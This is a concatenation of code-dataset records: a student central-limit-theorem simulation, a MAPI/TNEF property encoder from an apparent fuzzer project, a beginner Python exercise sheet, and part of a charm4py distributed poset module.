[]\ndef simulate_central_limit(random_samples,sample_size):\n Avrage = []\n for i in range(random_samples):\n Each_Thorw = []\n\n random_sample=(np.random.exponential((1 / rate), sample_size))\n\n Avrage.append(np.mean(random_sample))\n \n avg_each_roll = Avrage\n mean = np.mean(Avrage)\n var = np.var(Avrage)\n return avg_each_roll, mean, var\n\n\n# In[53]:\n\n\navgs1, mean1, var1 = simulate_central_limit(50,2)\n\n\n#Second exp\n# use another 5000 random samples ,sample size= 500\navgs2, mean2, var2 = simulate_central_limit(5000,500)\n\nprint(\"First 50 random samples: \")\nprint(\"Mean = {0:f}, Variance = {1:f}\".format(mean1, var1))\nprint(\"Average of outcomes in each case: \", avgs1, \"\\n\")\n\nprint(\"Another 50 random samples: \")\nprint(\"Mean = {0:f}, Variance = {1:f}\".format(mean2, var2))\nprint(\"Average of outcomes in each case: \", avgs2, \"\\n\")\n\n\n# In[54]:\n\n\nplt.hist(avgs1, bins=100);\n# plt.title('Histogram of first random 50 samples');\n\n\n# In[55]:\n\n\n# use another 5000 random samples ,sample size= 500 (Secand exp)\nplt.hist(avgs2, bins=100);\nplt.title('Histogram of another 50 random samples: ' );\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"rawann99/Central-Limit-theorem","sub_path":"221002179 Assighment_2.py","file_name":"221002179 Assighment_2.py","file_ext":"py","file_size_in_byte":1398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36573128001","text":"\r\nimport struct\r\nimport sys\r\nfrom datetime import datetime, timedelta\r\nimport uuid\r\nfrom pyout.enums.mapi import MapiEnum\r\n\r\n\r\nclass MapiProps:\r\n\r\n OLETIME_INIT = datetime(1899, 12, 30)\r\n SYSTIME_INIT = datetime(1601, 1, 1)\r\n\r\n class NeedGuidError(Exception):\r\n\r\n def __init__(self):\r\n Exception.__init__(self, \"GUID and propMap expected.\")\r\n\r\n class ArrayMismatchError(Exception):\r\n\r\n def __init__(self):\r\n Exception.__init__(self, \"Property type and data array mismatch.\")\r\n\r\n class WrongTypeError(Exception):\r\n\r\n def __init__(self, propTag):\r\n Exception.__init__(self, \"Unknown type 0x{:04X}.\".format(propTag & 0xFFFF))\r\n\r\n class Prop:\r\n \"\"\" Mapi property holder \"\"\"\r\n\r\n IDTYPE_NUMBER = 0\r\n IDTYPE_STRING = 1\r\n\r\n def __init__(self, propTag, data=None, **kwargs):\r\n \"\"\" Create prop tag.\r\n kwargs:\r\n type - MapiEnum.PT_ - change prop type\r\n guid - named property guid\r\n map - named property map (int or str/unicode)\r\n \"\"\"\r\n self.propTag = propTag\r\n self.data = None if data is None else MapiProps.pad(data)\r\n if 'type' in kwargs:\r\n self.propTag = (self.propTag & 0xFFFF0000) | kwargs['type']\r\n self.guid = kwargs.get('guid')\r\n self.map = kwargs.get('map')\r\n if self.propTag > 0x80000000 and not self.guid:\r\n raise MapiProps.NeedGuidError()\r\n if self.guid and self.map is None:\r\n raise MapiProps.NeedGuidError()\r\n\r\n def dumpTnef(self):\r\n ret = struct.pack('I', self.propTag)\r\n if self.guid:\r\n ret += MapiProps.convertGuid(self.guid)\r\n if isinstance(self.map, basestring):\r\n ret += struct.pack('I', self.IDTYPE_STRING)\r\n ret += MapiProps.convertUnicode(self.map)\r\n else:\r\n ret += struct.pack('I', self.IDTYPE_NUMBER)\r\n ret += struct.pack('I', self.map)\r\n if self.data is not None:\r\n ret += self.data\r\n return ret\r\n\r\n class BinStream:\r\n\r\n def __init__(self, data, version=2, type=1, flags=1):\r\n self.data = data\r\n self.version = version\r\n self.type = type\r\n self.flags = flags\r\n self.reserved = \"\\x00\" 
* 28\r\n\r\n def dump(self):\r\n ret = struct.pack('III', self.version, self.type, self.flags)\r\n ret += self.reserved\r\n ret += struct.pack(\"I\", len(self.data))\r\n ret += self.data\r\n return ret\r\n\r\n def __init__(self):\r\n self.clear()\r\n\r\n @staticmethod\r\n def parse(fp, sz, dump=None, dfile=None):\r\n ln = struct.unpack(\"I\", fp.read(4))[0]\r\n print >> sys.stderr, \"MapiProps\", ln, \":\"\r\n e = MapiEnum()\r\n for i in range(ln):\r\n pid = struct.unpack(\"I\", fp.read(4))[0]\r\n spec = ''\r\n if pid > 0x80000000:\r\n g = uuid.UUID(bytes_le=fp.read(16))\r\n spec = str(g) + '_'\r\n tp, lid = struct.unpack(\"II\", fp.read(8))\r\n if tp == 0:\r\n spec += str(lid)\r\n else:\r\n bts = lid * 2\r\n spec += fp.read(bts - 2).decode(\"utf-16le\")\r\n fp.read(2 + 0 if (bts % 4) == 0 else 2)\r\n tp = pid & 0x7FFF\r\n if pid & 0x1000 or tp in [e.PT_STRING8, e.PT_UNICODE, e.PT_OBJECT, e.PT_BINARY]:\r\n arr = struct.unpack(\"I\", fp.read(4))[0]\r\n else:\r\n arr = 1\r\n data = []\r\n pidfmt = \"{:08X}\".format(pid)\r\n nm = e.getName(pid)\r\n for x in range(arr):\r\n if tp in [e.PT_NULL, e.PT_NONE]:\r\n continue\r\n if tp == e.PT_I2:\r\n data += struct.unpack(\"I\", fp.read(4))\r\n elif tp in [e.PT_R4, e.PT_LONG, e.PT_ERROR, e.PT_BOOLEAN]:\r\n data += struct.unpack(\"I\", fp.read(4))\r\n elif tp in [e.PT_I8, e.PT_DOUBLE, e.PT_CURRENCY, e.PT_SYSTIME, e.PT_APPTIME]:\r\n data += struct.unpack(\"Q\", fp.read(8))\r\n elif tp == e.PT_CLSID:\r\n data += [uuid.UUID(bytes_le=fp.read(16))]\r\n elif tp in [e.PT_STRING8, e.PT_UNICODE, e.PT_OBJECT, e.PT_BINARY]:\r\n bsz = struct.unpack(\"I\", fp.read(4))[0]\r\n buf = fp.read(bsz)\r\n val = \":\" + str(bsz)\r\n if tp == e.PT_STRING8:\r\n val = buf[:-1]\r\n if tp == e.PT_UNICODE:\r\n val = buf[:-2].decode(\"utf-16le\")\r\n data += [val]\r\n if bsz % 4 != 0:\r\n fp.read(4 - (bsz % 4))\r\n if dump and dump in [pidfmt, nm]:\r\n with open(dfile, \"wb\") as f:\r\n f.write(buf)\r\n else:\r\n raise Exception(\"Unknown tag type: %08X\" % pid)\r\n print >> sys.stderr, \"{}:{} {} {}\".format(pidfmt, nm, spec, str(data))\r\n\r\n @staticmethod\r\n def replaceRtf(data, rtfdata):\r\n return data\r\n\r\n def clear(self):\r\n self.props = []\r\n return self\r\n\r\n def dumpTnef(self):\r\n ret = struct.pack('I', len(self.props))\r\n for x in self.props:\r\n ret += x.dumpTnef()\r\n return ret\r\n\r\n def isArr(self, data, default=True):\r\n if data is None:\r\n return default\r\n return isinstance(data, (list, tuple))\r\n\r\n def oleTime(self, dtm):\r\n if not isinstance(dtm, datetime):\r\n return dtm\r\n delta = dtm - MapiProps.OLETIME_INIT\r\n day = timedelta(days=1)\r\n return delta.total_seconds() / day.total_seconds()\r\n\r\n def sysTime(self, dtm):\r\n if not isinstance(dtm, datetime):\r\n return dtm\r\n delta = dtm - MapiProps.SYSTIME_INIT\r\n return delta.microseconds * 10\r\n\r\n @staticmethod\r\n def pad(string, padding=4):\r\n while len(string) % padding != 0:\r\n string += \"\\x00\"\r\n return string\r\n\r\n @staticmethod\r\n def convertBinary(binary):\r\n ret = struct.pack('I', len(binary))\r\n ret += binary\r\n return MapiProps.pad(ret)\r\n\r\n @staticmethod\r\n def convertString(string):\r\n return MapiProps.convertBinary(string + \"\\x00\")\r\n\r\n @staticmethod\r\n def convertUnicode(string):\r\n if not isinstance(string, unicode):\r\n string = string.decode('ascii')\r\n return MapiProps.convertBinary(string.encode('utf-16le') + \"\\x00\" * 2)\r\n\r\n @staticmethod\r\n def convertGuid(guid):\r\n return guid.bytes_le\r\n\r\n def convertData(self, 
propTag, data, default, converter):\r\n if data is None:\r\n data = [default] if propTag & 0x1000 != 0 else default\r\n if self.isArr(data):\r\n return [converter(x) for x in data]\r\n else:\r\n return converter(data)\r\n\r\n def addRaw(self, propTag, data, **kwargs):\r\n \"\"\"Add property\r\n \"\"\"\r\n if self.isArr(data):\r\n val = struct.pack('I', len(data))\r\n val += ''.join(data)\r\n else:\r\n val = data\r\n prop = MapiProps.Prop(propTag, val, **kwargs)\r\n self.props += [prop]\r\n return self\r\n\r\n def addFmt(self, propTag, data, fmt, **kwargs):\r\n data = self.convertData(propTag, data, 0, lambda x: struct.pack(fmt, x))\r\n return self.addRaw(propTag, data, **kwargs)\r\n\r\n def addInt16(self, propTag, data=None, **kwargs):\r\n return self.addFmt(propTag, data, 'h', **kwargs)\r\n\r\n def addInt32(self, propTag, data=None, **kwargs):\r\n return self.addFmt(propTag, data, 'i', **kwargs)\r\n\r\n def addInt64(self, propTag, data=None, **kwargs):\r\n return self.addFmt(propTag, data, 'q', **kwargs)\r\n\r\n def addFloat(self, propTag, data=None, **kwargs):\r\n return self.addFmt(propTag, data, 'f', **kwargs)\r\n\r\n def addDouble(self, propTag, data=None, **kwargs):\r\n return self.addFmt(propTag, data, 'd', **kwargs)\r\n\r\n def addCurrency(self, propTag, currencyId=None, **kwargs):\r\n return self.addInt64(propTag, currencyId, **kwargs)\r\n\r\n def addAppTime(self, propTag, dtm=None, **kwargs):\r\n data = self.convertData(propTag, dtm, datetime.now(), self.oleTime)\r\n return self.addDouble(propTag, data, **kwargs)\r\n\r\n def addError(self, propTag, data=None, **kwargs):\r\n return self.addInt32(propTag, data, **kwargs)\r\n\r\n def addBool(self, propTag, data=None, **kwargs):\r\n if data is None or isinstance(data, bool):\r\n data = 1 if data else 0\r\n return self.addInt16(propTag, data, **kwargs)\r\n\r\n def addObject(self, propTag, data=None, **kwargs):\r\n data = self.convertData(propTag, data, '', MapiProps.convertBinary)\r\n return self.addRaw(propTag, data if self.isArr(data) else [data], **kwargs)\r\n\r\n def addString(self, propTag, data=None, **kwargs):\r\n data = self.convertData(propTag, data, '', MapiProps.convertString)\r\n return self.addRaw(propTag, data if self.isArr(data) else [data], **kwargs)\r\n\r\n def addUnicode(self, propTag, data=None, **kwargs):\r\n data = self.convertData(propTag, data, '', MapiProps.convertUnicode)\r\n return self.addRaw(propTag, data if self.isArr(data) else [data], **kwargs)\r\n\r\n def addSysTime(self, propTag, dtm=None, **kwargs):\r\n data = self.convertData(propTag, dtm, datetime.now(), self.sysTime)\r\n return self.addInt64(propTag, data, **kwargs)\r\n\r\n def addGuid(self, propTag, data=None, **kwargs):\r\n data = self.convertData(propTag, data, uuid.uuid1(), MapiProps.convertGuid)\r\n return self.addRaw(propTag, data, **kwargs)\r\n\r\n def addBinary(self, propTag, data=None, **kwargs):\r\n data = self.convertData(propTag, data, '', MapiProps.convertBinary)\r\n return self.addRaw(propTag, data if self.isArr(data) else [data], **kwargs)\r\n\r\n def addBinStream(self, propTag, data=None, **kwargs):\r\n if not isinstance(data, MapiProps.BinStream):\r\n data = MapiProps.BinStream(data, **kwargs)\r\n return self.addBinary(propTag, data.dump(), **kwargs)\r\n\r\n def rtf(self, data=None, **kwargs):\r\n return self.addBinary(MapiEnum.PR_RTF_COMPRESSED, data, **kwargs)\r\n\r\n def add(self, propTag, data=None, **kwargs):\r\n tp = propTag & 0xFFFF\r\n if tp & 0x1000 != 0 and not self.isArr(data):\r\n raise 
MapiProps.ArrayMismatchError()\r\n if tp & 0x1000 == 0 and self.isArr(data, False):\r\n raise MapiProps.ArrayMismatchError()\r\n if tp in [MapiEnum.PT_NONE, MapiEnum.PT_NULL]:\r\n return self.addRaw(propTag, data, **kwargs)\r\n elif tp in [MapiEnum.PT_I2, MapiEnum.PT_MV_I2]:\r\n return self.addInt16(propTag, data, **kwargs)\r\n elif tp in [MapiEnum.PT_LONG, MapiEnum.PT_MV_LONG]:\r\n return self.addInt32(propTag, data, **kwargs)\r\n elif tp in [MapiEnum.PT_LONG, MapiEnum.PT_MV_LONG]:\r\n return self.addInt32(propTag, data, **kwargs)\r\n elif tp in [MapiEnum.PT_R4, MapiEnum.PT_MV_R4]:\r\n return self.addFlt32(propTag, data, **kwargs)\r\n elif tp in [MapiEnum.PT_DOUBLE, MapiEnum.PT_MV_DOUBLE]:\r\n return self.addFlt64(propTag, data, **kwargs)\r\n elif tp in [MapiEnum.PT_CURRENCY, MapiEnum.PT_MV_CURRENCY]:\r\n return self.addCurrency(propTag, data, **kwargs)\r\n elif tp in [MapiEnum.PT_APPTIME, MapiEnum.PT_MV_APPTIME]:\r\n return self.addAppTime(propTag, data, **kwargs)\r\n elif tp == MapiEnum.PT_ERROR:\r\n return self.addError(propTag, data, **kwargs)\r\n elif tp == MapiEnum.PT_BOOLEAN:\r\n return self.addBool(propTag, data, **kwargs)\r\n elif tp == MapiEnum.PT_OBJECT:\r\n return self.addObject(propTag, data, **kwargs)\r\n elif tp in [MapiEnum.PT_I8, MapiEnum.PT_MV_I8]:\r\n return self.addInt64(propTag, data, **kwargs)\r\n elif tp in [MapiEnum.PT_STRING8, MapiEnum.PT_MV_STRING8]:\r\n return self.addString(propTag, data, **kwargs)\r\n elif tp in [MapiEnum.PT_UNICODE, MapiEnum.PT_MV_UNICODE]:\r\n return self.addUnicode(propTag, data, **kwargs)\r\n elif tp in [MapiEnum.PT_SYSTIME, MapiEnum.PT_MV_SYSTIME]:\r\n return self.addSysTime(propTag, data, **kwargs)\r\n elif tp in [MapiEnum.PT_CLSID, MapiEnum.PT_MV_CLSID]:\r\n return self.addGuid(propTag, data, **kwargs)\r\n elif tp in [MapiEnum.PT_BINARY, MapiEnum.PT_MV_BINARY]:\r\n return self.addBinary(propTag, data, **kwargs)\r\n else:\r\n raise MapiProps.WrongTypeError()\r\n","repo_name":"mypasswordisqwerty/outl64","sub_path":"fuzzer/generators/mapiprop.py","file_name":"mapiprop.py","file_ext":"py","file_size_in_byte":12888,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"8421903931","text":"#Question2\r\nprint(5**9)\r\nprint(3//2)\r\nprint(7//30)\r\nprint(7/30)\r\nprint(6 == 6)\r\na = 20\r\na+= 30\r\na%=3\r\nprint(a)\r\nprint(True * False)\r\nprint(True & False)\r\nprint(True and False)\r\nprint(((6>3) and (7<4) or (18==3)) and (9>3))\r\nprint(True is False)\r\n#print(False in ‘False’)\r\nprint(((True == False) or (False > True)) and (False <= True))\r\n\r\n#Question3\r\ns1= \"nice to have it\"\r\ns2 = \"here\"\r\nprint(s1+' '+s2)\r\n\r\n#Question4\r\na = [1,2,[3,4],[5,[100,200,['hello']],23,11],1,7]\r\nprint(a[3][1][2])\r\n\r\n#Question5\r\ns1= \"nice to have it\"\r\ns2 = \"here\"\r\na.insert(0,s1)\r\na.append(s2)\r\nprint(a)\r\n\r\n#Question6\r\nnumbers = [386, 462, 47, 418, 907, 344, 236, 375, 823, 566, 597, 978, 328, 615, \r\n953, 345, 399, 162, 758, 219, 918, 237, 412, 566, 826, 248, 866, 950, 626, 949, \r\n687, 217, 815, 67, 104, 58, 512, 24, 892, 894, 767, 553, 81, 379, 843, 831, 445, \r\n742, 717, 958,743, 527]\r\na = []\r\nfor i in numbers :\r\n if (i==237):\r\n a.append(i)\r\n break\r\n elif (i% 2 == 0):\r\n \r\n a.append(i)\r\nprint(a)\r\n\r\n#Question7\r\ncolor_list_1 = set([\"White\", \"Black\", \"Red\"]) \r\ncolor_list_2 = set([\"Red\", \"Green\"])\r\n\r\ncol = color_list_1-color_list_2\r\nprint(col)\r\n\r\n#Question8\r\nstr = \"My name is varsha jain\"\r\nif 
(str.isalpha()):\r\n print(\"string is pangram\")\r\nelse :\r\n print(\"string is not pangram\")\r\n\r\n#Question9\r\nn= eval(input(\"enter a number\"))\r\nsum = n + (n*10 +n)+(n*100+n*10+n)\r\nprint(sum)\r\n\r\n#Question 10\r\nn = input('enter a string')\r\nn1= n.split('#')\r\nprint(n1)\r\nl1 = n1[0].split()\r\nl2 = n1[1].split()\r\nprint(l1)\r\nprint(l2)\r\n\r\n#question 11\r\nl = input(\"enter a string\")\r\ns =l.split(',')\r\ns.sort()\r\nprint(s)\r\n\r\n#Question12\r\nd = {'Student': ['Rahul', 'Kishore', 'Vidhya', 'Raakhi'], \r\n'Marks': [57,87,67,79]}\r\nd1 = d['Marks']\r\nd2 = d['Student']\r\nprint(d1)\r\nhigh = max(d1)\r\nj=0\r\nfor i in range(len(d1)):\r\n if d1[i]==high:\r\n j =i\r\nprint(d2[j])\r\n\r\n#Question 13\r\nstr = eval(input(\"enter a string \"))\r\nc1 = 0\r\nc2 = 0\r\nfor i in str:\r\n if (i.isalpha()):\r\n c1+=1\r\n elif (i.isdigit()):\r\n c2+=1\r\nprint(\"no. of alphabets are\",c1)\r\nprint(\"no. of digits are \",c2)\r\n\r\n#Question 14\r\nd = {'Name': ['Akash', 'Soniya', 'Vishakha' , 'Akshay', 'Rahul', 'Vikas'],\r\n'Subject': ['Python', 'Java', 'Python', 'C', 'Python', 'Java'],\r\n'Ratings': [8.4, 7.8, 8, 9, 8.2, 5.6]}\r\ninp = input(\"enter subject name\")\r\nnew1 = []\r\nnew2 =[]\r\nnew3=[]\r\nsub = d['Subject']\r\nl1 = d['Name']\r\nl2=d['Ratings']\r\nfor i in range(len(sub)):\r\n if sub[i] == inp:\r\n new1+=sub[i]\r\n new2+=l1[i]\r\n new3+=l2[i]\r\nd1={}\r\nd1['Name']=new2\r\nd1['Subject']=new1\r\nd1['Ratings']=new3\r\nprint(d1)\r\n \r\n\r\n\r\n \r\n","repo_name":"jain-varsha24/15novml","sub_path":"sheet1.py","file_name":"sheet1.py","file_ext":"py","file_size_in_byte":2611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16016715591","text":"import charm4py\nfrom charm4py import charm, Chare, coro, Reducer, Group, Future, Array, Channel\nimport cdd\nimport numpy as np\nfrom copy import copy, deepcopy\nimport time\nimport itertools\nfrom functools import partial\nfrom collections import defaultdict\nimport encapsulateLP\nimport DistributedHash\nimport cvxopt\nfrom cylp.cy import CyClpSimplex\nfrom cylp.py.modeling.CyLPModel import CyLPArray\nimport sys\nimport warnings\nimport numba as nb\nimport random\n# import TLLHypercubeReach\nimport posetFastCharm_numba\nimport region_helpers\nfrom region_helpers import hashNodeBytes, tupToBytes, bytesToList\n\nwarnings.simplefilter(action = \"ignore\", category = RuntimeWarning)\n\n\nclass PosetNode(DistributedHash.Node):\n # DO NOT OVERRIDE PARENT'S __init__() method\n # DistributedHash will create a local property with a proxy, self.localProxy, that we can call\n # (we will use this to make sure that any necessary variables are copied to the required PEs)\n # DistributedHash will also add a property called parentChare to allow acces to data on the hash worker\n def dummy(self):\n pass\n # These methods are optional, and will be called at an appropriate time by DistributedHash if present\n def init(self):\n self.constraints = self.localProxy[self.storePe].getConstraintsOnly(ret=True).get()\n\n # def update(self):\n # pass\n\n # def check(self):\n # pass\n def update(self, lsb,msb,nodeBytes,N, originPe, face, witness, adj, *args):\n self.face |= set(face)\n if adj and isinstance(adj,dict):\n for ky in adj.keys():\n self.adj[ky] = adj[ky]\n\n def checkForInsert(self):\n return True\n\n def updateForInsert(self, lsb, msb, nodeBytes, N, originPe, face, witness, adj, *args):\n self.update(lsb, msb, nodeBytes, N, originPe, face, witness, adj, *args)\n\n\nclass 
localVar(Chare):\n def init(self,succGroupProxy,posetPElist):\n self.posetSuccGroupProxy = succGroupProxy\n self.posetPElist = posetPElist\n self.schedCount = 0\n # self.closedCalls = []\n self.skip = False\n self.counterExample = None\n def setConstraintsOnly(self,constraints):\n self.constraints = constraints\n self.schedCount = 0\n self.skip = False\n def getConstraintsOnly(self):\n return self.constraints\n # This method **must** be implemented for DistributedHash to work:\n @coro\n def getSchedCount(self):\n return self.schedCount\n def setSkip(self,val):\n # print('Executing setSkip on PE ' + str(charm.myPe()))\n self.skip = val\n # return 37\n @coro\n def reset(self):\n self.skip = False\n self.schedCount = 0\n @coro\n def schedRandomPosetPe(self):\n # self.schedCount += 1\n return random.choice(self.posetPElist)\n @coro\n def checkNode(self, *args):\n return True\n @coro\n def checkNodeRS(self,*args):\n return True\n @coro\n def checkForInsert(self):\n pass\n\nclass Poset(Chare):\n\n @coro\n def __init__(self, peSpec, nodeConstructor, localVarGroup, successorChare, usePosetChecking, feederSpec):\n\n # self.stackNum = batchSize\n # To do: check to make sure we're passed a valid Group in localVarGroup\n self.usePosetChecking = usePosetChecking\n self.localVarGroup = localVarGroup\n self.useDefaultLocalVarGroup = False\n\n self.nodeConstructor = nodeConstructor\n if self.nodeConstructor is None:\n self.nodeConstructor = PosetNode\n self.successorChare = successorChare\n if successorChare is None:\n self.successorChare = successorWorker\n else:\n self.successorChare = successorChare\n # Create a group to paralellize the computation of successors\n # (Use all PEs unless a list was explicitly passed to us)\n if peSpec == None:\n self.posetPEs = [(0,charm.numPes(),1)]\n self.hashPEs = [(0,charm.numPes(),1)]\n else:\n self.posetPEs = peSpec['poset']\n self.hashPEs = peSpec['hash']\n\n self.posetPElist = list(itertools.chain.from_iterable( \\\n [list(range(r[0],r[1],r[2])) for r in self.posetPEs] \\\n ))\n self.hashPElist = list(itertools.chain.from_iterable( \\\n [list(range(r[0],r[1],r[2])) for r in self.hashPEs] \\\n ))\n self.succGroupFull = Group(self.successorChare,args=[])\n charm.awaitCreation(self.succGroupFull)\n\n if localVarGroup is None:\n self.useDefaultLocalVarGroup = True\n self.usePosetChecking = False\n self.localVarGroup = Group(localVar,args=[])\n charm.awaitCreation(self.localVarGroup)\n self.localVarGroup.init(self.succGroupFull,self.posetPElist,awaitable=True).get()\n\n # Create a PE scheduler Chare for use in Reverse Search implementations\n self.rsPeScheduler = Chare(peSchedulerRS,args=[self.succGroupFull,self.posetPElist],onPE=0)\n charm.awaitCreation(self.rsPeScheduler)\n\n self.succGroupFull.initPEs(self.posetPElist,localVarGroup=self.localVarGroup,rsScheduler=self.rsPeScheduler)\n secs = [self.succGroupFull[r[0]:r[1]:r[2]] for r in self.posetPEs]\n self.succGroup = charm.combine(*secs)\n successorProxies = self.succGroupFull.getProxies(ret=True).get()\n self.successorProxies = list(itertools.chain.from_iterable( \\\n [successorProxies[r[0]:r[1]:r[2]] for r in self.posetPEs] \\\n ))\n self.useGPU = False\n\n # Initialize a new distributed hash table:\n self.distHashTable = Chare(DistributedHash.DistHash,args=[\n self.succGroupFull, \\\n self.nodeConstructor, \\\n self.localVarGroup, \\\n self.hashPEs, \\\n self.posetPEs, \\\n feederSpec \\\n ],onPE=0)\n charm.awaitCreation(self.distHashTable)\n self.migrationInfo = {'poset':[(self.posetPElist,self.thisProxy), 
(self.posetPElist, self.rsPeScheduler)], 'hash':[(self.hashPElist,self.distHashTable)] + self.distHashTable.getMigrationInfo(ret=True).get()}\n # print('Initialized distHashTable group')\n self.oldFlippedConstraints = None\n @coro\n def init(self):\n initFut = self.distHashTable.initialize(awaitable=True)\n initFut.get()\n @coro\n def getStats(self):\n statsFut = Future()\n self.succGroupFull.getStats(statsFut)\n stats = statsFut.get()\n stats['RegionCount'] = sum(self.levelSizes) + stats['RSRegionCount']\n stats['LevelSizes'] = self.levelSizes\n return stats\n @coro\n def getMigrationInfo(self):\n return self.migrationInfo\n\n def initialize(self, AbPairs, pt, fixedA, fixedb, normalize=1.0):\n self.AbPairs = deepcopy(AbPairs)\n self.pt = pt\n self.fixedA = fixedA.copy()\n self.fixedb = fixedb.copy()\n self.normalize = normalize\n self.N = len(self.AbPairs[0][0])\n self.nrms = []\n if normalize > 0:\n for out in range(len(AbPairs)):\n self.nrms.append(self.normalize / np.linalg.norm(np.hstack([self.AbPairs[out][1].reshape(-1,1),self.AbPairs[out][0]]),axis=1).reshape(-1,1))\n self.AbPairs[out][0] = self.nrms[out] * self.AbPairs[out][0]\n self.AbPairs[out][1] = self.nrms[out] * self.AbPairs[out][1]\n nrms = np.linalg.norm(self.fixedA,axis=1).reshape(-1,1) * self.normalize\n self.fixedA = (self.normalize/nrms) * self.fixedA\n self.fixedb = (self.normalize/nrms) * self.fixedb\n else:\n for out in range(len(AbPairs)):\n self.nrms.append(np.ones((self.N,1)))\n\n\n # self.N = len(self.AbPairs[0][0])\n # self.wholeBytes = (self.N + 7) // 8\n # self.tailBits = self.N - 8*(self.N // 8)\n\n\n @coro\n def setConstraint(self,lb=0,out=0,timeout=None,prefilter=True,rebasePt=None):\n self.populated = False\n self.incomplete = True\n self.N = len(self.AbPairs[0][0])\n if prefilter:\n createConstraints = region_helpers.flipConstraintsReducedMin\n else:\n createConstraints = region_helpers.flipConstraints\n self.flippedConstraints = createConstraints( \\\n -1*self.AbPairs[out][0], \\\n self.AbPairs[out][1] - lb*self.nrms[out], \\\n self.pt, \\\n self.fixedA, \\\n self.fixedb \\\n )\n self.N = self.flippedConstraints.N\n if not rebasePt is None:\n self.flippedConstraints.setRebase(copy(rebasePt))\n\n\n stat = self.succGroup.initialize(self.N,self.flippedConstraints,timeout,awaitable=True)\n stat.get()\n if self.useDefaultLocalVarGroup:\n self.localVarGroup.setConstraintsOnly(self.flippedConstraints,awaitable=True).get()\n\n self.populated = False\n self.oldFlippedConstraints = None\n self.levelSizes = [0]\n\n return 1\n\n @coro\n def getConstraintsObject(self):\n return self.flippedConstraints\n\n @coro\n def setSuccessorCommonProperty(self,prop,val):\n self.succGroupFull.setProperty(prop,val,awaitable=True).get()\n @coro\n def getSuccGroupProxy(self):\n return self.succGroupFull\n @coro\n def getTableLen(self):\n return self.distHashTable.getTableLen(ret=True).get()\n\n @coro\n def getHashTableProxy(self):\n return self.distHashTable\n @coro\n def clearHashTable(self):\n self.distHashTable.clearHashTable(awaitable=True).get()\n @coro\n def newTable(self,tableName):\n return self.distHashTable.newTable(tableName,ret=True).get()\n @coro\n def isTable(self,tableName):\n return self.distHashTable.isTable(tableName,ret=True).get()\n @coro\n def getActiveTable(self):\n return self.distHashTable.getActiveTable(ret=True).get()\n @coro\n def activateTable(self,tableName):\n return self.distHashTable.activateTable(tableName,ret=True).get()\n @coro\n def copyTable(self,src=None,dest=None):\n return 
self.distHashTable.copyTable(src=src,dest=dest,ret=True).get()\n @coro\n def deleteTable(self,tableName):\n return self.distHashTable.deleteTable(tableName,ret=True).get()\n @coro\n def getTableNames(self):\n return self.distHashTable.getTableNames(ret=True).get()\n\n # Because charm4py seems to filter **kwargs, pass all arguments to populatePoset in a single dictionary.\n # This avoids having to distinguish between those arguments that are for populatePoset itself and those\n # that are merely passed on to setMethod. This is an implementation distinction not a semantic one: all\n # of these arguments affect the behavior/output of \"populatePoset\"\n\n # opts dictionary keys 'clearTable' and 'retrieveFaces' set parameters in populatePoset itself; any\n # other keys are passed as keyword arguments to setMethod\n @coro\n def populatePoset(self,face=None,witness=None,adjUpdate=None,payload=None, opts={} ):\n if self.populated:\n return\n self.clearTable = 'speed'\n self.retrieveFaces = False\n self.verbose = True\n self.sendFaces = False\n self.queryReturnInfo = False\n defaultSettings = ['clearTable','retrieveFaces','verbose','sendFaces','queryReturnInfo']\n for ky in defaultSettings:\n if ky in opts:\n setattr(self,ky,opts[ky])\n #opts.pop(ky)\n if self.clearTable and self.sendFaces:\n print(f'ERROR: \\'clearTable\\' flag is incompatible with \\'sendFaces\\'.')\n return None\n\n\n #print(f'verbose is {self.verbose}')\n self.succGroup.setMethod(**opts)\n\n if 'hashStore' in opts and opts['hashStore'] == 'vertex':\n self.hashStoreMode = 2\n tol = opts['tol'] if 'tol' in opts else 1e-9\n rTol = opts['rTol'] if 'rTol' in opts else 1e-9\n self.distHashTable.updateNodeEqualityFn(nodeType='vertex', tol=tol, rTol=rTol, H=self.flippedConstraints.constraints, awaitable=True).get()\n else:\n self.distHashTable.updateNodeEqualityFn(nodeType='standard', awaitable=True).get()\n self.hashStoreMode = 0\n\n self.distHashTable.resetLevelCount(awaitable=True).get()\n #self.succGroup.testSend()\n\n checkVal = True\n level = 0\n thisLevel = [(self.flippedConstraints.root,tuple())]\n posetLen = 1\n self.levelSizes = [1]\n timedOut = False\n\n # Send this node into the distributed hash table and check it\n initFut = Future()\n self.distHashTable.initListening(initFut,queryReturnInfo=self.queryReturnInfo,awaitable=True).get()\n initFut.get()\n self.succGroupFull.startListening(awaitable=True).get()\n\n boolIdxNoFlip = bytearray(b'\\x00') * (self.flippedConstraints.wholeBytes + (1 if self.flippedConstraints.tailBits != 0 else 0))\n for unflipIdx in range(len(thisLevel[0][0])-1,-1,-1):\n boolIdxNoFlip[thisLevel[0][0][unflipIdx]//8] = boolIdxNoFlip[thisLevel[0][0][unflipIdx]//8] | (1<<(thisLevel[0][0][unflipIdx] % 8))\n self.successorProxies[0].hashAndSend([ \\\n boolIdxNoFlip, \\\n thisLevel[0][0], \\\n self.flippedConstraints.N, \\\n tuple() if face is None else face, \\\n self.flippedConstraints.pt if witness is None else witness \\\n ], \\\n adjUpdate=(False if not adjUpdate else adjUpdate), \\\n payload=(tuple() if payload is None else payload), \\\n vertex=(None if self.hashStoreMode != 2 else (self.flippedConstraints.pt,tuple())), \\\n ret=True).get()\n thisLevel = [( \\\n boolIdxNoFlip if self.hashStoreMode == 1 else thisLevel[0][0], \\\n self.flippedConstraints.N, \\\n 0, \\\n tuple() if face is None else face, \\\n self.flippedConstraints.pt if witness is None else witness, \\\n False if not adjUpdate else adjUpdate, \\\n tuple() if payload is None else payload\n )]\n\n 
